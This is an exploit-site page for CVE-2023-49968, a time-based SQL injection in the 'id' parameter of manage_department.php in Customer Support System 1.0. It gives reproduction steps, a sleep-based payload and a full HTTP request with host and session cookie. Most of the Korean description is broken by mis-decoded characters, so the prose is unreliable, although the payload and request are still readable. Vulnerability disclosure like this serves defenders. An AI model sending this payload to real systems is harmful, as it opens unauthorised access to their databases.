## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GERALDOALCANTARA-CVE-2023-49968
# CVE-2023-49968
# Customer Support System 1.0 - manage_department.phpμ "id" URL λ§€κ°λ³μλ₯Ό ν΅ν SQL μΈμ μ
μ·¨μ½μ
**μ€λͺ
** : Customer Support System λ²μ 1μ SQL μΈμ μ
μ·¨μ½μ μ΄ μ‘΄μ¬ν©λλ€. μ
μμ μΈ κ³΅κ²©μλ λΆμλ₯Ό νΈμ§νλ λμ 'id' URL λ§€κ°λ³μλ₯Ό μ‘°μνμ¬ MySQL λ°μ΄ν°λ² μ΄μ€μμ SQL λͺ
λ Ήμ μ€νν μ μμ΅λλ€.
**μ·¨μ½ν μ ν λ²μ ** : Customer Support System 1.0
**CVE μμ±μ** : Geraldo AlcΓ’ntara
**λ μ§** : 28/11/2023
**νμΈ λ μ§** : 19/12/2023
**CVE** : CVE-2023-49968
**ν
μ€νΈ νκ²½** : Windows
### μ¬ν λ¨κ³:
1- μ ν리μΌμ΄μ
μ λ‘κ·ΈμΈν©λλ€.
2- λΆμ νΈμ§ νμ΄μ§λ‘ μ΄λνμ¬ "Action" λ²νΌμ ν΄λ¦νκ³ "Edit"λ₯Ό μ νν©λλ€.
3- 'id' λ§€κ°λ³μκ° μ λ¬λμ΄ μ
μ± νμ΄λ‘λλ₯Ό μ½μ
ν μ μκ² λ©λλ€. **νμ΄λ‘λ** : (select*from(select(sleep(5)))a)
### μμ²:
root@kitploit:~
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n